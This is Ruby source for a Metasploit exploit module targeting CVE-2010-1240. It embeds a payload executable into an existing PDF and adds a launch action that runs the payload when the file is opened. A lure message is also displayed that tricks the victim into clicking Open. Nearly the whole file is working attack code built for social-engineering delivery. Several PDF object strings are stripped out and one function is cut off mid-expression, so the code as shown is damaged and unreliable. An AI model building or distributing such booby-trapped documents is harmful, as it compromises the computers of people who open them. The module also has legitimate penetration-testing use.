## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse include Msf::Exploit::FILEFORMAT include Msf::Exploit::EXE def initialize(info = {}) super( update_info( info, 'Name' => 'Adobe PDF Embedded EXE Social Engineering', 'Description' => %q{ This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack. }, 'License' => MSF_LICENSE, 'Author' => [ 'Colin Ames ', # initial module 'jduck' # add Documents for vista/win7/win10 ], 'References' => [ [ 'CVE', '2010-1240' ], [ 'OSVDB', '63667' ], [ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ], [ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ], [ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-15.html' ] ], 'DisclosureDate' => '2010-03-29', 'Payload' => { 'Space' => 4096, 'DisableNops' => true }, 'Arch' => [ ARCH_X86, ARCH_X64 ], 'Platform' => 'win', 'Targets' => [ [ 'Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7/10 (English)', { 'Ret' => '' } ] ], 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'Reliability' => [ REPEATABLE_SESSION ], 'SideEffects' => [ ARTIFACTS_ON_DISK, # the EXE is transferred to disk to be executed SCREEN_EFFECTS # a message is shown to the user, see: LAUNCH_MESSAGE ] } ) ) register_options( [ OptPath.new('INFILENAME', [ true, 'The Input PDF filename.', ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-1240', 'template.pdf') ]), OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']), OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area', 'To view the encrypted content please check the "Do not show this message again" box and press Open.' ]), ] ) end def exploit file_name = datastore['INFILENAME'] print_status("Reading in '#{file_name}'...") stream = read_pdf begin print_status("Parsing '#{file_name}'...") pdf_objects = parse_pdf(stream) xref_trailers = pdf_objects[0] trailers = pdf_objects[1] startxrefs = pdf_objects[2] root_obj = pdf_objects[3] output = basic_social_engineering_exploit({ xref_trailers: xref_trailers, root_obj: root_obj, stream: stream, trailers: trailers, file_name: file_name, startxref: startxrefs.last }) print_good("Parsing Successful. Creating '#{datastore['FILENAME']}' file...") file_create(output) rescue KeyError => e # Lazy fix: # Similar to the problem with NoMethod -- something we need is missing in the PDF. # But really what happens is the module trusts the PDF too much. # Don't be sorry, you're a beautiful human we all appreciate greatly print_error("Sorry, I'm picky. Incompatible PDF structure. Please try a different PDF template.") elog('Sorry, I\'m picky. Incompatible PDF structure', error: e) rescue NoMethodError => e # Lazy fix: # When a NoMethod error is hit, that means that something in the PDF is actually missing, # so we can't parse it. If we can't parse it properly, then we can't garantee the exploit # will work, either. So we might as well just reject it. print_error("Sorry, I'm picky. Incompatible PDF structure, please try a different PDF template.") elog('Sorry, I\'m picky. Incompatible PDF structure', error: e) end end def ef_payload(pdf_name, obj_num) print_status("Using '#{datastore['PAYLOAD']}' as payload...") payload_exe = generate_payload_exe file_size = payload_exe.length stream = Rex::Text.zlib_deflate(payload_exe) md5 = Rex::Text.md5(stream) output = String.new output << "#{obj_num.to_i + 1} 0 obj\r<>/Desc(#{pdf_name})/Type/Filespec>>\rendobj\r" output << "#{obj_num.to_i + 2} 0 obj\r<>>>>" output << "stream\r#{stream}\r\nendstream\rendobj\r" return output end def js_payload(pdf_name, obj_num) output = String.new output << "#{obj_num.to_i + 3} 0 obj\r<>\rendobj\r" output << "#{obj_num.to_i + 4} 0 obj\r< 2) print_warning('Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.') end output << '&' + # NOTE: the following doesn't work with spaces, and adding quotes doesn't execute the payload :-/ "(start #{pdf_name}.pdf)" + # NOTE: The below message modifies the text in the "File:" textfield of the "Launch File" dialog ("\n" * 10) + launch_message + # NOTE: this extra rparen is required. ')' \ ">>>>\rendobj\r" return output end def basic_social_engineering_exploit(opts = {}) xref_trailers = opts[:xref_trailers] root_obj = opts[:root_obj] stream = opts[:stream] trailers = opts[:trailers] file_name = opts[:file_name] startxref = opts[:startxref] file_name = file_name.split(%r{/}).pop.to_s match = file_name.match(/(.+)\.pdf/) if match pdf_name = match[1] end catalog = parse_object(xref_trailers, root_obj, stream) match = catalog.match(/Names (\d+ \d) R/m) if match names = parse_object(xref_trailers, match[1], stream) match = names.match(/EmbeddedFiles (\d+ \d) R/m) if match embedded_files = parse_object(xref_trailers, match[1], stream) new_embedded_files = embedded_files.gsub(/(\]>>)/m, "(\xfe\xff#{Rex::Text.to_unicode(pdf_name, 'utf-16be')})#{trailers[0].fetch('Size')} 0 R" + '\1') else new_names = names.gsub(/(>>.*)/m, "/EmbeddedFiles #{trailers[0].fetch('Size')} 0 R" + '\1') end else new_catalog = catalog.gsub(/(Pages \d+ \d R)/m, '\1' + "/Names #{trailers[0].fetch('Size')} 0 R") end if catalog.match(/OpenAction/m) match = catalog.match(/OpenAction (\d+ \d) R/m) if match if new_catalog if new_embedded_files new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch('Size').to_i + 2} 0 R") elsif new_names new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch('Size').to_i + 3} 0 R") else new_catalog = new_catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch('Size').to_i + 4} 0 R") end elsif new_embedded_files new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch('Size').to_i + 2} 0 R") elsif new_names new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch('Size').to_i + 3} 0 R") else new_catalog = catalog.gsub(/OpenAction \d+ \d R/m, "OpenAction #{trailers[0].fetch('Size').to_i + 4} 0 R") end elsif new_catalog new_catalog = new_catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch('Size').to_i + 4} 0 R") else new_catalog = catalog.gsub(/OpenAction ?\[.+\]/m, "OpenAction #{trailers[0].fetch('Size').to_i + 3} 0 R") end elsif new_catalog if new_embedded_files new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m, '\1' + "/OpenAction #{trailers[0].fetch('Size').to_i + 2} 0 R") elsif new_names new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m, '\1' + "/OpenAction #{trailers[0].fetch('Size').to_i + 3} 0 R") else new_catalog = new_catalog.gsub(/(Names \d+ \d R)/m, '\1' + "/OpenAction #{trailers[0].fetch('Size').to_i + 4} 0 R") end elsif new_embedded_files new_catalog = catalog.gsub(/(Pages \d+ \d R)/m, '\1' + "/OpenAction #{trailers[0].fetch('Size').to_i + 2} 0 R") elsif new_names new_catalog = catalog.gsub(/(Pages \d+ \d R)/m, '\1' + "/OpenAction #{trailers[0].fetch('Size').to_i + 3} 0 R") else new_catalog = catalog.gsub(/(Pages \d+ \d R)/m, '\1' + "/OpenAction #{trailers[0].fetch('Size').to_i + 4} 0 R") end pages_obj = catalog.match(/Pages (\d+ \d) R/m)[1] pages = parse_object(xref_trailers, pages_obj, stream) page_obj = pages.match(/Kids ?\[\r?\n? *(\d+ \d) R/m)[1] page = parse_object(xref_trailers, page_obj, stream) match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m) while match page_obj = match[1] page = parse_object(xref_trailers, page_obj, stream) match = page.match(/Kids ?\[\r?\n? *(\d+ \d) R/m) end match = page.match(%r{AA<> *\r?\n? *endobj)/m, "/AA<<\/O #{trailers[0].fetch('Size').to_i + 3} 0 R>>" + '\1') end new_pdf << new_catalog xrefs << xref_create(new_pdf, (new_pdf.length - new_catalog.length), '1') new_pdf << new_page xrefs << xref_create(new_pdf, (new_pdf.length - new_page.length), '1') new_pdf << new_embedded_files xrefs << xref_create(new_pdf, (new_pdf.length - new_embedded_files.length), '1') if trailers[0].key?('ID') new_pdf << "xref\r\n" << xrefs << "trailer\r\n<>\r\n" else new_pdf << "xref\r\n" << xrefs << "trailer\r\n<>\r\n" end new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_embedded_files.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" elsif new_names num = trailers[0].fetch('Size').to_i pdf_payload << "#{num} 0 obj\r<>\rendobj\r" pdf_payload << ef_payload(pdf_name, num) pdf_payload << js_payload(pdf_name, num) new_pdf << stream << pdf_payload xrefs = xref_create(new_pdf, stream.length, '*') new_size = trailers[0].fetch('Size').to_i + 5 if aa new_page = page.gsub(%r{(AA<> *\r?\n? *endobj)/m, "/AA<<\/O #{trailers[0].fetch('Size').to_i + 4} 0 R>>" + '\1') end new_pdf << new_catalog xrefs << xref_create(new_pdf, (new_pdf.length - new_catalog.length), '1') new_pdf << new_page xrefs << xref_create(new_pdf, (new_pdf.length - new_page.length), '1') new_pdf << new_names xrefs << xref_create(new_pdf, (new_pdf.length - new_names.length), '1') if trailers[0].key?('ID') new_pdf << "xref\r\n" << xrefs << "trailer\r\n<>\r\n" else new_pdf << "xref\r\n" << xrefs << "trailer\r\n<>\r\n" end new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_names.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" else num = trailers[0].fetch('Size').to_i + 1 pdf_payload << "#{trailers[0].fetch('Size')} 0 obj\r<>\rendobj\r" pdf_payload << "#{num} 0 obj\r<>\rendobj\r" pdf_payload << ef_payload(pdf_name, num) pdf_payload << js_payload(pdf_name, num) new_pdf << stream << pdf_payload xrefs = xref_create(new_pdf, stream.length, '*') new_size = trailers[0].fetch('Size').to_i + 6 if aa new_page = page.gsub(%r{(AA<> *\r?\n? *endobj)/m, "/AA<<\/O #{trailers[0].fetch('Size').to_i + 5} 0 R>>" + '\1') end new_pdf << new_catalog xrefs << xref_create(new_pdf, (new_pdf.length - new_catalog.length), '1') new_pdf << new_page xrefs << xref_create(new_pdf, (new_pdf.length - new_page.length), '1') if trailers[0].key?('ID') new_pdf << "xref\r\n" << xrefs << "trailer\r\n<>\r\n" else new_pdf << "xref\r\n" << xrefs new_pdf << "trailer\r\n" new_pdf << "<>\r\n" end new_pdf << "startxref\r\n#{stream.length + pdf_payload.length + new_page.length + new_catalog.length}\r\n%%EOF\r\n" end return new_pdf end end